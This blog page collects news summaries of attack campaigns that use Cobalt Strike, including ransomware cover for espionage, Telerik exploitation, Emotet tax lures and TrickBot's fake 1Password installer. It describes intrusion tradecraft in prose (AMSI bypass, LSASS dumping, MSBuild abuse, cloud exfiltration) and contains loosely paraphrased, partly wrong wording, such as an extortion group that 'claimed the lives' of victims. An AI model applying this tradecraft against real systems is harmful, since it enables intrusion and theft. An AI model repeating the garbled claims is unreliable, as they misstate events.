Search This Blog

Showing posts with label Cobalt Strike. Show all posts

Chinese APT Utilizes Ransomware to Cover Cyberespionage

 

A China-based advanced persistent threat (APT) group called Bronze Starlight has been active since the start of 2021. It appears to be using double-extortion attacks and ransomware as cover for routine, state-sponsored cyberespionage and intellectual property theft. 

The distribution of post-intrusion ransomware, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0, is a feature of Bronze Starlight. Microsoft also labeled it as part of the DEV-0401 emerging threat cluster, highlighting its involvement in all phases of the ransomware attack cycle, from initial access to the payload dissemination.

China's Correlation

The threat actor has always loaded Cobalt Strike Beacon and then released ransomware on compromised computers using a malware loader known as the HUI Loader, which is solely utilized by  Chinese-based organizations. This method has not been noticed by other threat actors, according to Secureworks researchers.

Researchers from Secureworks believe that Bronze Starlight is more likely motivated by cyberespionage and intellectual property (IP) theft than financial gain due to the short lifespan of each ransomware family, victimology, and access to tools used by Chinese state hacktivists (including known vulnerabilities and the HUI Loader). HUI Loader has been used to distribute malware such as Cobalt Strike, QuasarRAT, PlugX, and SodaMaster as well as remote access trojans (RATs) at least since 2015.

Attacks carried out by the actor are distinguished by the use of vulnerabilities influencing Exchange Server, Zoho ManageEngine ADSelfService Plus, Atlassian Confluence, and Apache Log4j. This contrasts with other RaaS groups that obtain access from initial access brokers (IABs) to enter a network. 

The similarity between Ransomware 

Additionally, a familiar actor is apparent from the similarities found between LockFile, Atom Silo, Rook, Night Sky, and Pandora, the latter three of which were developed from the Babuk ransomware, the source code of which was leaked in September 2021. 

The researchers write that the use of HUI Loader to load Cobalt Strike Beacon, the configuration data for Cobalt Strike Beacon, the C2 network, and the code overlap "indicate that the same threat group is linked with these 5 ransomware families."

The use of the HUI Loader to launch next-stage encrypted payloads like PlugX and Cobalt Strike Beacons, which are used to disseminate the ransomware, is another instance of detected tradecraft. However, this technique requires first getting privileged Domain Administrator credentials. 

The main victims are American and Brazilian pharmaceutical firms, a U.S. media outlet with branches in China and Hong Kong, Lithuanian and Japanese electronic component designers and manufacturers, a U.S. legal company, and the aerospace & defense unit of an Indian conglomerate. 

To achieve this, ransomware operations not only give the threat actor a way to phish data as a result of the double extortion, but they also give them a chance to erase forensic proof of its destructive actions and distract them from data theft.

Attackers Exploit Telerik Vulnerabilities to Deploy Cobalt Strike

 

A hacker called ‘Blue Mockingbird’ is exploiting Telerik UI flaws to breach servers, install Cobalt Strike beacons, and deploy cryptomining malware. 

The vulnerability tracked as CVE-2019-18935 with a critical severity score (CVSS v3.1: 9.8), impacts the Telerik UI library for ASP.NET AJAX and is a high-risk deserialization security bug that can lead to remote code execution. 

Blue Mockingbird was also identified in May 2020 targeting susceptible Microsoft IIS servers that employed Telerik UI, even though it had been a year after the vendor had published security patches. Earlier this week, Sophos researchers revealed that Blue Mockingbird is leveraging the same flaw to launch new cyberattacks. 

To exploit CVE-2019-18935, the hackers must secure the encryption keys that guard Telerik UI’s serialization on the target. This may be done by using CVE-2017-11317 and CVE-2017-11357 or abusing another vulnerability in the target web app. 

Since multiple web apps were used as projects that embedded the Telerik UI framework version at the time of development and later were discontinued, they are still legitimate targets accessible for exploitation. Once the keys are acquired, the hackers can compile a malicious DLL containing the code to be executed during deserialization and launch it in the context of the ‘w3wp.exe’ process. 

According to the researchers, in recent assaults, Blue Mockingbird employed a readily available proof-of-concept (PoC) vulnerability to manage the encryption logic and automate the DLL compilation. The payload used in the recent assaults is a Cobalt Strike beacon, a stealthy, legitimate penetration testing tool hacker exploits for executing encoded PowerShell commands. 

Persistence is achieved by Active Directory Group Policy Objects (GPOs), which manufacture scheduled tasks in a new registry entry that contains base64-encoded PowerShell. To mitigate Windows Defender detection, the script employs typical AMSI-bypassing methodologies to download and load a Cobalt Strike DLL into memory. 

The second-stage program (‘crby26td.exe’) is an XMRig Miner, a common open-source cryptocurrency miner for Monero, one of the least detected cryptocurrencies. Notably, this was the primary goal of the threat actor’s 2020 campaign; therefore, the attack chain, methodologies, and goals haven’t altered significantly. 

On the other hand, Cobalt Strike allows for simple lateral movement within an exploited network, data exfiltration, account takeover, and the deployment of more powerful payloads like ransomware. It remains unclear whether Blue Mockingbird is interested in investigating these possibilities; for the time being, or they’re only focused on Monero mining.

Gh0stCringe Malware Recently Attacked Insecure Microsoft SQL and MySQL Servers

 

Hackers are deploying the Gh0stCringe remote support trojans on vulnerable computers by inadequately targeting secured Microsoft SQL and MySQL database servers. 

Gh0stCringe, also known as CirenegRAT, is a Gh0st RAT malware variant that was most recently used in Chinese cyber-espionage activities in 2020, however, it has been around since 2018. The malware has several instructions and functionalities which can be activated after the malware connects to its command and control server, or through data stored in the virus's settings. 

Attackers can use Gh0stCringe to download payloads like crypto miners from C2 servers, access specified websites via the Internet Explorer web browser, and even wipe the start-up disk's Master Boot Record (MBR). The malware includes a keylogger, which records input data in the Default. key file in the Windows System directory if it is activated. 

Threat actors are infiltrating database servers and writing the malicious'mcsql.exe' executable to disc utilizing the mysqld.exe, mysqld-nt.exe, and sqlserver.exe processes. These assaults are comparable to the Microsoft SQL server attempts, which used the Microsoft SQL xp cmdshell command to drop Cobalt Strike beacons. In addition to Gh0stCringe, AhnLab's study notes the presence of numerous malware samples on the investigated servers, implying potentially competing threat actors are infiltrating the same servers to drop payloads with its own operations.

Gh0stCringe RAT is a strong virus that can connect to a C2 server to receive custom commands or exfiltrate stolen data to the enemies. For an endless loop, the keylogging component uses the Windows Polling method (GetAsyncKeyState API) to ask the state of each key. This otherwise dependable recording mechanism carries the risk of very high CPU utilization, however, this is unlikely to cause issues for threat actors on poorly maintained servers. The malware will also record keystrokes for the previous three minutes and send them to the infection's command and control servers along with basic system and network information. 

Threat actors will be able to steal login passwords and other sensitive information that logged-in users entered on the device using these logged keystrokes. CirenegRAT has four operational modes: 0, 1, 2, and a specific Windows 10 mode which the threat actor can choose from during deployment.

Update your server software to install the most recent security upgrades, which can help you avoid a variety of attacks to make use of known flaws. It's also critical to use a secure admin password that can't be brute-forced. The most important step is to put the database server behind a firewall to only allow authorized devices to connect to it.

Emotet Malware Campaign Masquerades the IRS for 2022 Tax Season

 

The Emotet malware botnet is taking advantage of the 2022 tax season in the United States by mailing out fraudulent emails posing as the Internal Revenue Service, which is supposed to be issuing tax forms or federal returns. 

Emotet is a malware infection spread via phishing emails with malicious macros attached to Word or Excel documents. When the user opens these documents, they will be misled into allowing macros that will install the Emotet malware on the device. Emotet will capture victims' emails to use in future reply-chain attacks, send more spam emails, and eventually install other malware that could lead to a Conti ransomware assault on the targeted network once it is implemented. 

Researchers have discovered various phishing attempts masquerading the Internet Revenue Service (IRS.gov) that use lures relevant to the 2022 US tax season, according to a recent analysis by email security firm Cofense. These emails ostensibly come from the IRS, and they claim to be sending the recipient their 2021 Tax Return, W-9 forms, and other tax documents that are often needed during tax season. 

While the subject lines and content of IRS-themed emails vary, the fundamental notion is that the IRS is contacting the company with either finished tax forms or ones that one must fill out and return. Zip files or HTML pages that lead to zip files are attached to the emails and are password-protected to avoid detection by secure email gateways. Third-party archive programs like 7-Zip, on the other hand, have no trouble extracting the files. 

A 'W-9 form.xslm' Excel file is included in the zip files, and when viewed, it prompts the user to click the "Enable Editing" and "Enable Content" buttons to see the document correctly. When a user clicks one of these buttons, malicious macros are launched, downloading and installing the Emotet virus from hacked WordPress sites. Once Emotet is loaded, it will download further payloads, which in recent campaigns have mostly been Cobalt Strike. 

Emotet has also dropped the SystemBC remote access Trojan, according to Cryptolaemus, an Emotet research organisation. With the Conti Ransomware gang now developing Emotet, all businesses, large and small, should be on the watch for these phishing tactics, which can escalate to ransomware assaults and data theft. It's important to remember that the IRS never sends unsolicited emails and only communicates via postal mail. As a result, if anyone receives an email from the IRS purporting to be from the IRS, flag it as spam and delete it.

A Worldwide Fraud Campaign Used Targeted Links to Rob Millions of Dollars

 

Infrastructure overlaps tied to the TrickBot botnet can be seen in large-scale phishing activity employing hundreds of domains to steal information for Naver, a Google-like web platform in South Korea. The resources employed in this assault demonstrate the magnitude of the cybercriminal effort to gather login data to carry out attacks. 

Naver, like Google, offers a wide range of services, including web search, email, news, and the NAVER Knowledge iN online Q&A platform. Its credentials, in addition to granting access to regular user accounts, can also grant access to enterprise environments due to password reuse. 

Earlier this year, security researchers from cyber intelligence firm Prevailion began its inquiry using a domain name shared by Joe Sowik, mailmangecorp[.]us, which led to a "vast network of targeted phishing infrastructure designed to gather valid login credentials for Naver." Additionally, PACT analysts discovered similarities with the WIZARD SPIDER [a.k.a. TrickBot] network while researching the hosting infrastructure utilized to serve the Naver-themed phishing pages. 

The fraudsters enticed victims with phoney surveys and incentives purporting to be from well-known brands, the lure was meant to help the criminals steal victims' personal information and credit card information. Tens of millions of people in 91 countries, including the United States, Canada, South Korea, and Italy, were shown to have been targeted by the scammers.

To entice potential victims, the cybercriminals sent out invitations to participate in a survey, along with the promise of a prize if they completed it. Advertising on both legitimate and illegitimate websites, contextual advertising, SMS and email messages, and pop-up notifications were all used in the campaign. To develop trust with the victims, lookalike domains modeled after authentic ones were registered. 542 unique domains were linked to the operation, 532 of which were utilized for Naver-themed phishing. Authorities found the operator would register a group of web addresses linked to a single IP address using an email address.

According to the researchers, two Cobalt Strike beacon variants on Virus Total were linked to 23.81.246[.]131 as part of a campaign that used CVE-2021-40444 to spread Conti ransomware, a typical TrickBot payload. The end page's content is as personalized as possible to the victim's interests, with the customized link only accessible once, making detection significantly more difficult and enabling the scheme to last longer. 

The victim is also informed to be eligible for a prize and one must supply personal information such as one's complete name, email and physical addresses, phone number, and credit card information, including expiration date and CVV for the same. Prevalion believes one explanation that justifies the conclusions is cybercriminals should use an "infrastructure-as-a-service" model for their operations.

Entropy Ransomware Connected to Dridex Malware, as per Sophos

 

The recently found Entropy ransomware has coding similarities to the Dridex malware, which started out as a banking trojan. After two Entropy cybercrimes on different firms, researchers were able to establish a bond between the different pieces of malware. 

Sophos principal researcher Andrew Brandt claimed in a new study detection signature designed to detect Dridex which prompted a closer look into the Entropy virus, both of the target businesses had gadgets were unprotected. Despite the characteristic for recognizing the Dridex packer code, endpoint protection measures blocked the attack, which was started by identifying the Entropy packer code.

In all incidents, the attackers gained remote access to the target networks by infecting them with Cobalt Strike Beacons and Dridex before deploying Entropy. Despite some similarities, the twin attacks differed greatly in terms of the initial access point used to parasite its path within the networks, the period invested in each environment, and the malware utilized to initiate the final stage of the invasion. 

The attack on the media company employed the ProxyShell vulnerability to infect a vulnerable Exchange Server with a web shell, which was then used to deploy Cobalt Strike Beacons throughout the network. The attacker is alleged to have spent four months doing espionage and data theft before launching the cyberattack in December 2021. The second attack on the provincial government agency was made possible via a malicious email attachment carrying the Dridex virus.

Notably, prior to encryption of the files on the hacked machines, redundant exfiltration of confidential documents to more than just one cloud storage service – in the form of packed RAR archives – occurred within 75 hours of the initial discovery of a suspect login session on a single machine. Apart from employing respectable tools like AdFind, PsExec, and PsKill, the resemblance between Dridex and Entropy samples and past DoppelPaymer extortion infections has raised the likelihood of a "similar origin."

The network of links between the various types of malware is worth mentioning; the Dridex malware, an information-stealing botnet, is thought to be the product of Indrik Spider, a well-known Russian cybercrime outfit  Evil Corp. 

The Evil Corp cluster continues to improve its tradecraft, continually altering payload signatures, exploitation tools, and initial access methods to mislead attribution. SentinelOne researchers identified the "evolutionary" ties in a standalone analysis, claiming nearly identical design, implementation, and functionality amongst various iterations of the malware, with the file-encrypting malware buried using a packer named CryptOne. 

"The attackers took advantage of a lack of attention in both situations - both targets had vulnerable Windows PCs which were missing relevant patches and updates," said Andrew Brandt, chief researcher at Sophos. Attackers would have had to work harder to gain first access into the Exchange Server if it had been patched properly.

Threat Actors use MSBuild to Execute Cobalt Strike Beacons

 

Malicious campaigns have recently been spotted abusing Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on vulnerable machines. MSBuild, which was designed for the construction of Windows applications, uses a project file element called 'Tasks' to designate components that are executed during project building, and threat actors are misusing these Tasks to launch malicious code disguised as MSBuild. Renato Marinho, a Morphus Labs security researcher, and SANS Internet Storm Center (ISC) handler claims that two different malicious campaigns have been discovered utilizing MSBuild for code execution in the last week. 

MSBuild is a build tool that aids in the automation of the software development process, including source code compilation, packaging, testing, deployment, and documentation creation. It is feasible to build Visual Studio projects and solutions with MSBuild even if the Visual Studio IDE is not installed. MSBuild is a free and open-source software. MSBuild was previously included with the.NET Framework; however, starting with Visual Studio 2013, it is now included with Visual Studio. MSBuild is a functional replacement for the nmake utility, which is still used in projects created with previous Visual Studio editions. 

MSBuild operates on MSBuild project files, which have an XML syntax comparable to Apache Ant or NAnt. Despite the fact that the syntax is based on a well-defined XML schema, the fundamental structure and operation are comparable to the traditional Unix make utility: the user specifies what will be used (typically source code files) and what the result should be (typically a static library, DLL, or executable application), but the utility decides what to do and in which order to carry out the build. 

Threat actors often obtain access to the target environment through the use of a genuine remote desktop protocol (RDP) account, then employ remote Windows Services (SCM) for lateral movement and MSBuild to execute the Cobalt Strike Beacon payload. The malicious MSBuild project was created to build and run certain C# code, which then decodes and executes Cobalt Strike. 

Marinho further claims that after confirming that Beacon was used in the attack, he was able to decrypt the SSL-encrypted communication with the command and control (C&C) server. To avoid such attacks, the researcher recommends that enterprises use the Windows Defender Application Control (WDAC) policy to restrict Microsoft-signed applications that potentially allow the execution of other malware. MSBuild generates a list of these apps. 

“There is a note for MSBuild.exe, though, that if the system is used in a development context to build managed applications, the recommendation is to allow MSBuild.exe in the code integrity policies,” Marinho concluded.

Blister Malware Silently Slips Through Windows Defences

 

Cybersecurity researchers have revealed details of an evasive malware campaign that uses valid code signing certificates to bypass security defences and remain undetected, with the purpose of distributing Cobalt Strike and BitRAT payloads on infected systems. Elastic Security researchers dubbed the binary, a loader, "Blister," and the malware samples had negligible to zero detections on VirusTotal. The infection vector utilized to stage the attack, as well as the eventual goals of the infiltration, are unknown. 

A notable aspect of the attacks is that they make use of a legitimate Sectigo code signing certificate. The malware has been seen signed with the certificate in question since September 15, 2021. Elastic stated that it has contacted the company in order to get the exploited certificates revoked. "Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables," researchers Joe Desimone and Samir Bousseaden said. "Their use allows attackers to remain under the radar and evade detection for a longer period of time." 

Another intriguing component of this campaign is what looks to be a novel malware loader with few VirusTotal detections. It's known as the BLISTER loader. The loader is likely spliced into genuine libraries like colorui.dll to guarantee that the majority of the on-disk footprint contains known-good code and metadata. The loader can be written to disc from simple dropper executables at first. One such dropper saves a signed BLISTER loader to %temp%\Framwork\axsssig.dll and runs it with rundll32. BLISTER's LaunchColorCpl is a popular DLL export and entry point name. 

BLISTER uses a basic 4-byte XOR routine to decode bootstrapping code stored in the resource area when it is run. The bootstrapping code is extensively obfuscated and sleeps for 10 minutes at first. This is almost certainly an attempt to avoid sandbox analysis. It decrypts the embedded malware payload after the delay. CobaltStrike and BitRat have been identified as embedded malware payloads by researchers. When the embedded payload is decoded, it is either loaded into the current process or injected into a newly generated WerFault.exe process.

Elastic Security has alerted Sectigo that Blister's code signing certificate has been revoked; nonetheless, the company has also produced a Yara rule to assist organizations in identifying the new malware.

‘Karakurt’ Extortion Back with an Upswing

 

As of late, a new money-driven attack group has been on the upswing, and unlike previous groups, it does not appear to be interested in spreading ransomware or attacking high-profile targets. 

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish, and is also the name of a deadly spider prevalent in eastern Europe and Siberia. 

Karakurt specializes in data exfiltration and eventual extortion, which allows them to operate swiftly. It already has claimed the lives of more than 40 people until September, with 95 percent of them in North America and the rest in Europe, according to a paper released on Friday by academics. 

Experts suggest Karakurt would be a trend-setter, and shortly, similar groups may shift away from attacking large corporations or critical-infrastructure providers with ransomware and instead take a similar exfiltration/extortion technique. 

“The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” read the report.

According to Accenture CIFR researchers, Karakurt was originally spotted by investigators outside of Accenture Security in June since it started building up its network and data-leak platforms. In August, the group registered the domains karakurt.group and karakurt.tech, as well as the Twitter, handle @karakurtlair. Shortly the organization launched its first successful attack. 

Accenture Security's collecting sources and intrusion research discovered the organization's first target in September; two months later, the group revealed their victim on the karakurt.group website.

Karakurt's tactics, techniques, and procedures (TTP) for infiltrating victim infrastructures, accomplishing persistence, relocating laterally, and stealing data are similar to those used by numerous threat actors and the group frequently takes a "living off the land" strategy relying on the attack surface, i.e., utilizing tools or features which already belong across the targeted system. 

Karakurt primarily employs service installation, remote-management software, and the delivery of command-and-control (C2) beacons throughout victim environments via Cobalt Strike to sustain persistence once connected to a network. 

However, experts have noticed that the group recently appears to have changed methods in its implementation of backup persistence. Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices" rather than delivering Cobalt Strike, they stated. This enables the gang to migrate laterally by leveraging previously obtained user, service, and administrator personal information. 

Researchers stated the gang will also employ additional remote-management technologies, such as remote desktop protocol (RDP), Cobalt Strike, and PowerShell commands, to travel laterally and uncover relevant data to steal and exploit for extortion reasons as needed. 

Nevertheless, the group's assault pattern thus far demonstrates that it is adaptable enough to change its techniques based on the victim's circumstances. Karakurt can also avoid detection in many circumstances since it frequently utilizes authorized credentials to access websites. 

Ultimately, Karakurt employs 7zip and WinZip for data compression, along with Rclone or FileZilla (SFTP) for staging and final exfiltration to Mega.io cloud storage, to steal information. Also according to Accenture Security, the staging folders utilized to exfiltrate data in assaults were C:Perflogs and C:Recovery. 

Researchers offered standard mitigation recommendations to enterprises to prevent being penetrated and extorted by Karakurt, which will call them several times to put pressure over them to pay once their data has been stolen.

Cuba Ransomware Group Compromised the Networks of at Least 49 Organizations

 

The FBI has issued a new warning regarding the Cuba ransomware, stating that the gang has targeted "49 entities in five critical infrastructure sectors" and made at least $43.9 million in ransom. The FBI claimed the gang is targeting enterprises in the financial, government, healthcare, manufacturing, and information technology sectors, and is employing the Hancitor malware to gain access to Windows systems, according to an alert sent out on Friday. 

The Hancitor malware downloader is used to transmit Cuba ransomware to victims' networks, allowing the ransomware gang to have greater access to previously hacked corporate networks. Hancitor (Chancitor) is a ransomware that distributes data stealers, Remote Access Trojans (RATs), and other ransomware. It was discovered spreading the Vawtrak information-stealing trojan, according to Zscaler. Since then, it has shifted to password-stealers such as Pony and Ficker, as well as Cobalt Strike. 

Hancitor employs phishing emails and stolen passwords to get access to their victims' systems, as well as exploiting Microsoft Exchange vulnerabilities and breaking in via Remote Desktop Protocol (RDP) tools. Cuba ransomware operators would exploit legal Windows services (e.g., PowerShell, PsExec, and numerous other unspecified services) to remotely deliver their ransomware payloads and encrypt files with the ".cuba" extension once they have gained access using Hancitor.

When a victim's computer is infected, the ransomware downloads and installs a CobaltStrike beacon, as well as two executable files. Attackers can use the two files to get passwords and "write to the compromised system's temporary (TMP) file."

"Once the TMP file is uploaded, the 'krots.exe' file is deleted, and the TMP file is executed in the compromised network. The TMP file includes Application Programming Interface (API) calls related to memory injection that, once executed, deletes itself from the system. Upon deletion of the TMP file, the compromised network begins communicating with a reported malware repository located at Montenegro-based Uniform Resource Locator (URL) teoresp.com," the FBI explained. 

Other assault details were included by the FBI, as well as a sample ransom note and email sent by the attackers. Given their degree of activity in comparison to other more well-known ransomware gangs, experts were startled by the amount of money the group had amassed. The data, according to Emsisoft threat analyst Brett Callow, demonstrated how lucrative the ransomware market is, despite the fact that the Cuba ransomware organization is not among the top ten in terms of activity.

Ransomware Threat Actors on the Rise in US, Target Big Organizations

 

A hacker earlier linked with the Thieflock ransomware campaign, currently might be using the rising Yanluowang ransomware in a chain of attacks against U.S organizations. Symantec cybersecurity experts, a subdivision of Broadcom software, discovered links between Yanluowang and Thieflock, details of the former were revealed in October after experts found its use against a big firm. They believe that a hacker has been using this ransomware to attack financial organizations in the U.S. The threat actor also compromised various firms in the manufacturing sector, engineering, consultancy, and IT services, using the novel ransomware.

Experts noticed a probable link between new Yanluowang attacks and earlier attacks which involved Thieflock, a RaaS (ransomware as a service), built by the Canthroid group, aka Fivehands. This shows how there's no loyalty in ransomware users, especially those who work as affiliates of RaaS operations. As per ThreatPost, "Data-capture tools are also part of the attack vector, including a screen capture tool and a file exfiltration tool (filegrab.exe), as well as Cobalt Strike Beacon, which researchers saw deployed against at least one target." 

The ransomware developers pivot here and there, they switch business based on profit margins offered by ransomware threat actors, there's no loyalty in the business, says Vikram Thakur, chief research manager at Symantec. The experts have given a summary of some of the tools used in these attacks (Yanluowang), a few of these share some commonalities with the 

Thieflock attacks, which may lead someone to believe that the actor orchestrating the attack is an expert with Thieflock's deployment. "In most scenarios, attackers use PowerShell to download tools to compromised systems, including BazarLoader, which assists in reconnaissance of a system before attacks occur. The attackers then enable RDP via registry to enable remote access, deploying the legitimate remote access tool ConnectWise, formerly known as ScreenConnect, once they’ve gained this access," said ThreatPost.

Threat Actors Targeting Vaccine Manufacturing Facility with Tardigrade Malware

 

Biomanufacturing facilities in the US are being actively targeted by an anonymous hacking group leveraging a new custom malware called ‘Tardigrade’. 

In a new threat advisory, the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) claimed this week that the first attack was launched using this new malware in spring 2021, followed by the second assault in October.

 New malware strain

According to BIO-ISAC, Tardigrade possesses advanced features and is supposedly the work of an advanced threat detection group or a nation-state intelligence service. The malware is primarily used for espionage though it can also cause other issues including network outages. The recent assaults are also believed to be linked to Covid-19 research as the pandemic has shown just how crucial biomanufacturing research is when creating vaccines and other drugs. 

Tardigrade’s functionality includes a Trojan, keylogger, data theft, and also establishes a backdoor into targeted systems. There is some debate regarding the origins of the code used in Tardigrade as BIO-ISAC believes the malware is based on Smoke Loader, a Windows-based backdoor operated by a hacking group called Smoky Spider. However, security researchers that spoke with Bleeping Computer believe that it is a form of the Cobalt Strike HTTP. 

“The biomanufacturing industry along with other verticals are so far behind in cybersecurity, making them a prime target for bad actors. Cyberattacks mostly happen to those that provide easy access or least path of resistance,” George Gerchow, chief security officer of machine data analytics company Sumo Logic Inc., told SiliconANGLE. 

“This is a blatant example of how attackers are focusing on human health during a time of high anxiety, and bioscience is an easy target. The industry is going to have to move quickly to put proper cyber security controls in place. It is going to be a huge mountain for them to climb as some of the companies in the industry have antiquated technology, lacked the proper skill sets, and relied too much on legacy security tools,” Gerchow added. 

The BIO-ISAC report recommends the following steps for biomanufacturing sites that will enhance the security and response postures (i) Scan your biomanufacturing network segmentation, (ii)  Collaborate with biologists and automation experts to design a full-proof analysis for your firm, (iii) Employ antivirus with behavioral analysis capabilities, (iv) Participate in phishing detection training (v) Stay vigilant.

Banco Pichincha: Ecuador's Largest Bank Hit by a Cyber Attack

 

Banco Pichincha, Ecuador's biggest private bank by capitalization and depositors, has been struck by a cyberattack that has crippled its operations and knocked the ATM and online banking website to be unavailable to the users. 

The intrusion happened over the weekend, and the bank had to lock down parts of its network to prevent the attack from spreading to other systems. The bank's systems have been taken down, causing considerable inconvenience, with ATMs no longer functioning and service notifications appearing on internet banking websites. 

The bank has 1.8 million customers, $4.5 billion in assets, and $4 billion in deposits, along with over 200 offices; Banco Pichincha has subsidiaries in Peru (Banco Financiero Per), Colombia (Banco Pichincha) and Panama (Banco Pichincha Panamá). And it also has a representative office in Miami and eight in Spain, comprising two each in Madrid, Barcelona, Murcia, and Comunidad Valenciana. 

Employees were informed that bank applications, email, digital channels, and self-services would be unavailable due to a technological issue, in an internal notification addressed to the Bank's departments. Self-service consumers should be guided to bank teller windows for assistance during the downtime, as per the internal memo. 

Banco Pichincha published a statement on Tuesday afternoon following two days of silence over the bank's technological troubles, acknowledging that their systems were disrupted by a cyberattack. 

The statement read: "In the last few hours, we have identified a cybersecurity incident in our computer systems that have partially disabled our services. We have taken immediate actions such as isolating the systems potentially affected from the rest of our network and have cybersecurity experts assist in the investigation. 

At the moment, our network of agencies, ATMs for cash withdrawals and payments with debit and credit cards are operational. 

This technological incident did not affect the financial performance of the bank. We reiterate our commitment to safeguard the interests of our clients and restore normal care through our digital channels in the shortest possible time. 

We call for calm to avoid generating congestion and to stay informed through the official channels of Banco Pichincha to avoid the spread of false rumors." - Banco Pichincha. 

Although, the origin of the attack has not been revealed to the public by the bank, according to insiders in the cybersecurity field, the hack is a ransomware attack with malicious attackers placing a Cobalt Strike beacon on the network. 

Cobalt Strike is often used by ransomware gangs as well as other threat actors to obtain endurance and access to additional systems on a system.

Linux Implementation of Cobalt Strike Beacon Employed by Hackers in Attacks Worldwide

 

Security experts have detected an unauthorized version of the Cobalt Strike Beacon Linux created by malicious attackers that are actively utilized to attack organizations worldwide. Cobalt Strike is a legal penetration testing tool built for the red-team attacking infrastructure (security organizations that function as attackers to detect the security and flaws in the infrastructure of their org). 

Cobalt Strike is often utilized for post-exploitation duties by malicious attackers (often dropped in ransomware campaigns) following the planting of so-called beacons that give permanent remote access to affected machines. Employing beacons, attackers may access compromised servers for the collection of data or distribute additional payloads of malware afterward. 

Over time, the cybercriminals acquired split copies of the Cobalt Strike and circulated this as one of the most prevalent instruments of cybersecurity threats culminating in theft and extortion of information. Cobalt Strike, however, has always had a problem - it enables only Windows devices and therefore does not contain Linux beacons. 

Further, as per a new analysis by the security company Intezer, scientists describe exactly how the threat actors have chosen to construct their cobalt strike-compatible Linux beacons. Malicious actors may now maintain and execute remote control over both Windows and Linux devices by utilizing these beacons. 

The undiscovered variant — dubbed "Vermilion Strike" — of the penetration testing program is one of the uncommon Linux ports, typically a Windows-based red team instrument which is heavily used by opponents to launch a range of specific attacks. As a threat simulation software, Cobalt Strike claims to be Beacon's payload designed to simulate a sophisticated actor and to double their post-exploitation behaviors. 

"The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands, and writing to files," Intezer researchers said in a report. 

Once installed, the malware starts the operation in the background, decoding the required configuration for the beacon to operate effectively just before the fingerprint identification of the Linux-compromised device and communicating to a remote server via DNS or HTTP to recover base64 encoded and AES-encrypted commands, to write files and upload them back to the webserver. 

"Vermilion Strike and other Linux threats remain a constant threat. The predominance of Linux servers in the cloud and its continued rise invites APTs to modify their toolsets to navigate the existing environment," the researchers said.

TrickBot Employs Bogus 1Password Installer to Launch Cobalt Strike

 

The Institute AV-TEST records around 450,000 new critical programmings (malware) every day with several potentially unwanted applications (PUA). These are thoroughly examined by their team under characteristic parameters and classified accordingly. 

Malware is a networking-generated file or code that infects, scans, exploits, or practically performs any activity that an attacker desires. 

One such prevalent malware is Trickbot which was first seen in 2016. Trickbot has established itself in cyberspace as a modular and multipurpose malware. The Trickbot operators initially focused on bank credential theft operations and then expanded their skills to attack several industries. With further advancements Trickbot came to light for its participation in ransomware attacks, using Ryuk and Conti malware. 

Recently, it has been found that Trickbot employs a technique for installing a bogus "1Password password manager" to corrupt and collect data on the victim's PC. The first way to accomplish this is with a password-protected Microsoft Word or Excel archive file with macros, that will compromise the targeted device if activated. For criminals to accumulate information about several network computers, a bogus 1Password file installer with the title "Setup1.exe" is also commonly used to launch the Cobalt Strike. 

1Password is an AgileBits Inc. developed password manager. It offers users a place in the digital void that is secured with the master password of the PBKDF2, to hold several passwords, Software licenses, and additional confidential material. 

In the regard, the DFIR Report states, “The Trickbot payload injected itself into the system process wermgr.exe — the Windows process responsible for error reporting. The threat actor then utilized built-in Windows utilities such as net.exe, ipconfig.exe, and nltest.exe for performing internal reconnaissance. Within two minutes of the discovery activity, WDigest authentication was enabled (disabled by default in Windows 10) in the registry on the infected host. This enforces credential information to be saved in clear text in memory. Shortly after applying this registry modification, the LSASS process was dumped to disk using the Sysinternals tool ProcDump.” 

This same bogus installer also eliminates a file that enables the execution of the Cobalt Strike (CS) shellcode and hence receives CS beacons. As the program allows unauthorized connection to victim systems, PowerShell commands are being used to gather data about victim PCs, such as their “anti-virus state”. 

Cobalt Strike is a commercial penetration test framework that helps an agent called 'Beacon' to be deployed by an attacker on the victim's network. Beacon has a wide range of functions including command execution, keylogging, data transfer, SOCKS proxy, privilege scale, port scanning, and lateral movement. 

Meanwhile, as the researchers highlighted, the acquired material was not exfiltrated and the group's motifs remain uncertain. If more advancements are noted in the near future, they will continue to update everyone on it, said the researchers. 

Consequently, researchers in cybersecurity must look for approaches to make sure that their customer facilities are secure from these techniques, as the gang can restart an attack on other networks anytime.

Detecting Cobalt Strike: Cybercrime Attacks

 

One of the latest researches revealed that cybercriminals who employ malware often use the Cobalt Strike tool to release multiple payloads after checking a compromised network. Cobalt Strike is paid penetration testing software that provides access to cyber attackers to execute an agent named 'Beacon' into the system of targeted personality. 

Cobalt Strike sends out beacons to detect network vulnerabilities which then deliver malware to create fake command-and-control (C2) profiles that appear genuine. Beacon provides so many functions to the attackers including, keylogging, SOCKS proxying, file transfer, privilege escalation, port scanning, mimikatz, and lateral movement. 

Cobalt Strike comes with a toolkit for developing shellcode loaders, named Artifact Kit. The Cobalt Strike tool kit is used by both parties including the security community as well as cybercriminals. 

Secureworks Counter Threat Unit (CTU) researchers’ team conducted an investigation on the use of Cobalt Strike to get information like when and how the tool has been used by the threat actors. The acquired information will work in favor of organizations to secure their systems against threat actors. 

Having a comprehensive understanding of the threat actor's end goal is essential while trying to secure the system. For instance, the financially motivated GOLD LAGOON cybercriminals group employs the Qakbot botnet to drop Cobalt Strike into the victims’ machine. CTU researchers team learned that GOLD LAGOON is executing Cobalt Strike to Qakbot-infected hosts that are often identified as members of an Active Directory domain. The group that has been active since 2007 also facilitates other cybercriminal groups that drop various ransomware families in compromised networks. 

The early detection of compromised interwork helps cybersecurity communities to recover or fix the victims’ system as soon as possible as highlighted by two similar incidents. 

